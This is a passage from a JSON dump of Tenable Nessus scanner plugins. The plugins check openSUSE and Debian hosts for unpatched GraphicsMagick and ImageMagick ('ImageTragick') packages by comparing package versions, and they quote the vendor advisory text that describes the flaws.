value:\"p-cpe:/a:novell:opensuse:GraphicsMagick-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:GraphicsMagick-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libGraphicsMagick++-Q16-12\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libGraphicsMagick++-Q16-12-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libGraphicsMagick++-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libGraphicsMagick-Q16-3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libGraphicsMagick-Q16-3-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libGraphicsMagick3-config\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libGraphicsMagickWand-Q16-2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libGraphicsMagickWand-Q16-2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:perl-GraphicsMagick\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:perl-GraphicsMagick-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/10/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.2|SUSE42\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.2 / 42.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.2\", reference:\"GraphicsMagick-1.3.25-11.34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"GraphicsMagick-debuginfo-1.3.25-11.34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"GraphicsMagick-debugsource-1.3.25-11.34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"GraphicsMagick-devel-1.3.25-11.34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libGraphicsMagick++-Q16-12-1.3.25-11.34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libGraphicsMagick++-Q16-12-debuginfo-1.3.25-11.34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libGraphicsMagick++-devel-1.3.25-11.34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libGraphicsMagick-Q16-3-1.3.25-11.34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libGraphicsMagick-Q16-3-debuginfo-1.3.25-11.34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libGraphicsMagick3-config-1.3.25-11.34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libGraphicsMagickWand-Q16-2-1.3.25-11.34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libGraphicsMagickWand-Q16-2-debuginfo-1.3.25-11.34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"perl-GraphicsMagick-1.3.25-11.34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"perl-GraphicsMagick-debuginfo-1.3.25-11.34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"GraphicsMagick-1.3.25-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"GraphicsMagick-debuginfo-1.3.25-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"GraphicsMagick-debugsource-1.3.25-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"GraphicsMagick-devel-1.3.25-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libGraphicsMagick++-Q16-12-1.3.25-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libGraphicsMagick++-Q16-12-debuginfo-1.3.25-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libGraphicsMagick++-devel-1.3.25-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libGraphicsMagick-Q16-3-1.3.25-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libGraphicsMagick-Q16-3-debuginfo-1.3.25-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libGraphicsMagick3-config-1.3.25-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libGraphicsMagickWand-Q16-2-1.3.25-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libGraphicsMagickWand-Q16-2-debuginfo-1.3.25-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"perl-GraphicsMagick-1.3.25-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"perl-GraphicsMagick-debuginfo-1.3.25-34.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"GraphicsMagick / GraphicsMagick-debuginfo / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-03-27T14:56:25", "description": "Nikolay Ermishkin from the Mail.Ru Security Team and Stewie discovered several vulnerabilities in ImageMagick, a program suite for image manipulation. These vulnerabilities, collectively known as ImageTragick, are the consequence of lack of sanitization of untrusted input. An attacker with control on the image input could, with the privileges of the user running the application, execute code (CVE-2016-3714 ), make HTTP GET or FTP requests (CVE-2016-3718 ), or delete (CVE-2016-3715 ), move (CVE-2016-3716 ), or read (CVE-2016-3717 ) local files.\n\nThese vulnerabilities are particularly critical if Imagemagick processes images coming from remote parties, such as part of a web service.\n\nThe update disables the vulnerable coders (EPHEMERAL, URL, MVG, MSL, and PLT) and indirect reads via /etc/ImageMagick-6/policy.xml file. In addition, we introduce extra preventions, including some sanitization for input filenames in http/https delegates, the full remotion of PLT/Gnuplot decoder, and the need of explicit reference in the filename for the insecure coders.", "cvss3": {"score": 8.4, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-05-17T00:00:00", "type": "nessus", "title": "Debian DSA-3580-1 : imagemagick - security update (ImageTragick)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-3714", "CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3717", "CVE-2016-3718"], "modified": "2021-11-30T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:imagemagick", "cpe:/o:debian:debian_linux:8.0"], "id": "DEBIAN_DSA-3580.NASL", "href": "https://www.tenable.com/plugins/nessus/91175", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3580. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(91175);\n script_version(\"2.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\"CVE-2016-3714\", \"CVE-2016-3715\", \"CVE-2016-3716\", \"CVE-2016-3717\", \"CVE-2016-3718\");\n script_xref(name:\"DSA\", value:\"3580\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Debian DSA-3580-1 : imagemagick - security update (ImageTragick)\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Nikolay Ermishkin from the Mail.Ru Security Team and Stewie discovered\nseveral vulnerabilities in ImageMagick, a program suite for image\nmanipulation. These vulnerabilities, collectively known as\nImageTragick, are the consequence of lack of sanitization of untrusted\ninput. An attacker with control on the image input could, with the\nprivileges of the user running the application, execute code\n(CVE-2016-3714 ), make HTTP GET or FTP requests (CVE-2016-3718 ), or\ndelete (CVE-2016-3715 ), move (CVE-2016-3716 ), or read (CVE-2016-3717\n) local files.\n\nThese vulnerabilities are particularly critical if Imagemagick\nprocesses images coming from remote parties, such as part of a web\nservice.\n\nThe update disables the vulnerable coders (EPHEMERAL, URL, MVG, MSL,\nand PLT) and indirect reads via /etc/ImageMagick-6/policy.xml file. In\naddition, we introduce extra preventions, including some sanitization\nfor input filenames in http/https delegates, the full remotion of\nPLT/Gnuplot decoder, and the need of explicit reference in the\nfilename for the insecure coders.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=823542\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2016-3714\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2016-3718\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2016-3715\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2016-3716\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2016-3717\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/imagemagick\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2016/dsa-3580\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the imagemagick packages.\n\nFor the stable distribution (jessie), these problems have been fixed\nin version 8:6.8.9.9-5+deb8u2.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:imagemagick\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/16\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/05/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"imagemagick\", reference:\"8:6.8.9.9-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"imagemagick-6.q16\", reference:\"8:6.8.9.9-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"imagemagick-common\", reference:\"8:6.8.9.9-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"imagemagick-dbg\", reference:\"8:6.8.9.9-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"imagemagick-doc\", reference:\"8:6.8.9.9-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libimage-magick-perl\", reference:\"8:6.8.9.9-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libimage-magick-q16-perl\", reference:\"8:6.8.9.9-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libmagick++-6-headers\", reference:\"8:6.8.9.9-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libmagick++-6.q16-5\", reference:\"8:6.8.9.9-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libmagick++-6.q16-dev\", reference:\"8:6.8.9.9-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libmagick++-dev\", reference:\"8:6.8.9.9-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libmagickcore-6-arch-config\", reference:\"8:6.8.9.9-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libmagickcore-6-headers\", reference:\"8:6.8.9.9-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libmagickcore-6.q16-2\", reference:\"8:6.8.9.9-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libmagickcore-6.q16-2-extra\", reference:\"8:6.8.9.9-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libmagickcore-6.q16-dev\", reference:\"8:6.8.9.9-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libmagickcore-dev\", reference:\"8:6.8.9.9-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libmagickwand-6-headers\", reference:\"8:6.8.9.9-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libmagickwand-6.q16-2\", reference:\"8:6.8.9.9-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libmagickwand-6.q16-dev\", reference:\"8:6.8.9.9-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libmagickwand-dev\", reference:\"8:6.8.9.9-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"perlmagick\", reference:\"8:6.8.9.9-5+deb8u2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-27T14:57:07", "description": "Nikolay Ermishkin from the Mail.Ru Security Team and Stewie discovered several vulnerabilities in ImageMagick, a program suite for image manipulation. These vulnerabilities, collectively known as ImageTragick, are the consequence of lack of sanitization of untrusted input. An attacker with control on the image input could, with the privileges of the user running the application, execute code (CVE-2016-3714), make HTTP GET or FTP requests (CVE-2016-3718), or delete (CVE-2016-3715), move (CVE-2016-3716), or read (CVE-2016-3717) local files.\n\nThese vulnerabilities are particularly critical if Imagemagick processes images coming from remote parties, such as part of a web service.\n\nThe update disables the vulnerable coders (EPHEMERAL, URL, MVG, MSL, and PLT) and indirect reads via /etc/ImageMagick/policy.xml file. In addition, we introduce extra preventions, including some sanitization for input filenames in http/https delegates, the full remotion of PLT/Gnuplot decoder, and the need of explicit reference in the filename for the insecure coders.\n\nFor the wheezy, these problems have been fixed in version 8:6.7.7.10-5+deb7u5.\n\nWe recommend that you upgrade your imagemagick packages.\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 8.4, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-05-23T00:00:00", "type": "nessus", "title": "Debian DLA-486-1 : imagemagick security update (ImageTragick)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-3714", "CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3717", "CVE-2016-3718"], "modified": "2021-11-30T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:imagemagick", "p-cpe:/a:debian:debian_linux:imagemagick-common", "p-cpe:/a:debian:debian_linux:imagemagick-dbg", "p-cpe:/a:debian:debian_linux:imagemagick-doc", "p-cpe:/a:debian:debian_linux:libmagick%2b%2b-dev", "p-cpe:/a:debian:debian_linux:libmagick%2b%2b5", "p-cpe:/a:debian:debian_linux:libmagickcore-dev", "p-cpe:/a:debian:debian_linux:libmagickcore5", "p-cpe:/a:debian:debian_linux:libmagickcore5-extra", "p-cpe:/a:debian:debian_linux:libmagickwand-dev", "p-cpe:/a:debian:debian_linux:libmagickwand5", "p-cpe:/a:debian:debian_linux:perlmagick", "cpe:/o:debian:debian_linux:7.0"], "id": "DEBIAN_DLA-486.NASL", "href": "https://www.tenable.com/plugins/nessus/91287", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-486-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(91287);\n script_version(\"2.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\"CVE-2016-3714\", \"CVE-2016-3715\", \"CVE-2016-3716\", \"CVE-2016-3717\", \"CVE-2016-3718\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Debian DLA-486-1 : imagemagick security update (ImageTragick)\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Nikolay Ermishkin from the Mail.Ru Security Team and Stewie discovered\nseveral vulnerabilities in ImageMagick, a program suite for image\nmanipulation. These vulnerabilities, collectively known as\nImageTragick, are the consequence of lack of sanitization of untrusted\ninput. An attacker with control on the image input could, with the\nprivileges of the user running the application, execute code\n(CVE-2016-3714), make HTTP GET or FTP requests (CVE-2016-3718), or\ndelete (CVE-2016-3715), move (CVE-2016-3716), or read (CVE-2016-3717)\nlocal files.\n\nThese vulnerabilities are particularly critical if Imagemagick\nprocesses images coming from remote parties, such as part of a web\nservice.\n\nThe update disables the vulnerable coders (EPHEMERAL, URL, MVG, MSL,\nand PLT) and indirect reads via /etc/ImageMagick/policy.xml file. In\naddition, we introduce extra preventions, including some sanitization\nfor input filenames in http/https delegates, the full remotion of\nPLT/Gnuplot decoder, and the need of explicit reference in the\nfilename for the insecure coders.\n\nFor the wheezy, these problems have been fixed in version\n8:6.7.7.10-5+deb7u5.\n\nWe recommend that you upgrade your imagemagick packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2016/05/msg00039.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/imagemagick\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:imagemagick\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:imagemagick-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:imagemagick-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:imagemagick-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libmagick++-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libmagick++5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libmagickcore-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libmagickcore5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libmagickcore5-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libmagickwand-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libmagickwand5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:perlmagick\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/22\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/05/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"imagemagick\", reference:\"8:6.7.7.10-5+deb7u5\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"imagemagick-common\", reference:\"8:6.7.7.10-5+deb7u5\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"imagemagick-dbg\", reference:\"8:6.7.7.10-5+deb7u5\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"imagemagick-doc\", reference:\"8:6.7.7.10-5+deb7u5\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libmagick++-dev\", reference:\"8:6.7.7.10-5+deb7u5\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libmagick++5\", reference:\"8:6.7.7.10-5+deb7u5\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libmagickcore-dev\", reference:\"8:6.7.7.10-5+deb7u5\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libmagickcore5\", reference:\"8:6.7.7.10-5+deb7u5\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libmagickcore5-extra\", reference:\"8:6.7.7.10-5+deb7u5\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libmagickwand-dev\", reference:\"8:6.7.7.10-5+deb7u5\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libmagickwand5\", reference:\"8:6.7.7.10-5+deb7u5\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"perlmagick\", reference:\"8:6.7.7.10-5+deb7u5\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-27T14:55:54", "description": "This update for ImageMagick fixes the following issues :\n\nThe update disables various insecure coders [boo#978061] These fix issues tracked in CVE-2016-3714, CVE-2016-3715, CVE-2016-3716, CVE-2016-3717, CVE-2016-3718", "cvss3": {"score": 8.4, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-05-09T00:00:00", "type": "nessus", "title": "openSUSE Security Update : ImageMagick (openSUSE-2016-569) (ImageTragick)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-3714", "CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3717", "CVE-2016-3718"], "modified": "2021-11-30T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:ImageMagick", "p-cpe:/a:novell:opensuse:ImageMagick-debuginfo", "p-cpe:/a:novell:opensuse:ImageMagick-debugsource", "p-cpe:/a:novell:opensuse:ImageMagick-devel", "p-cpe:/a:novell:opensuse:ImageMagick-devel-32bit", "p-cpe:/a:novell:opensuse:ImageMagick-extra", "p-cpe:/a:novell:opensuse:ImageMagick-extra-debuginfo", "p-cpe:/a:novell:opensuse:libmagick%2b%2b-6_q16-5", "p-cpe:/a:novell:opensuse:libmagick%2b%2b-6_q16-5-32bit", "p-cpe:/a:novell:opensuse:libmagick%2b%2b-6_q16-5-debuginfo", "p-cpe:/a:novell:opensuse:libmagick%2b%2b-6_q16-5-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libmagick%2b%2b-devel", "p-cpe:/a:novell:opensuse:libmagick%2b%2b-devel-32bit", "p-cpe:/a:novell:opensuse:libMagickCore-6_Q16-2", "p-cpe:/a:novell:opensuse:libMagickCore-6_Q16-2-32bit", "p-cpe:/a:novell:opensuse:libMagickCore-6_Q16-2-debuginfo", "p-cpe:/a:novell:opensuse:libMagickCore-6_Q16-2-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libMagickWand-6_Q16-2", "p-cpe:/a:novell:opensuse:libMagickWand-6_Q16-2-32bit", "p-cpe:/a:novell:opensuse:libMagickWand-6_Q16-2-debuginfo", "p-cpe:/a:novell:opensuse:libMagickWand-6_Q16-2-debuginfo-32bit", "p-cpe:/a:novell:opensuse:perl-PerlMagick", "p-cpe:/a:novell:opensuse:perl-PerlMagick-debuginfo", "cpe:/o:novell:opensuse:13.2"], "id": "OPENSUSE-2016-569.NASL", "href": "https://www.tenable.com/plugins/nessus/90981", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2016-569.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(90981);\n script_version(\"2.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\"CVE-2016-3714\", \"CVE-2016-3715\", \"CVE-2016-3716\", \"CVE-2016-3717\", \"CVE-2016-3718\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"openSUSE Security Update : ImageMagick (openSUSE-2016-569) (ImageTragick)\");\n script_summary(english:\"Check for the openSUSE-2016-569 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for ImageMagick fixes the following issues :\n\nThe update disables various insecure coders [boo#978061] These 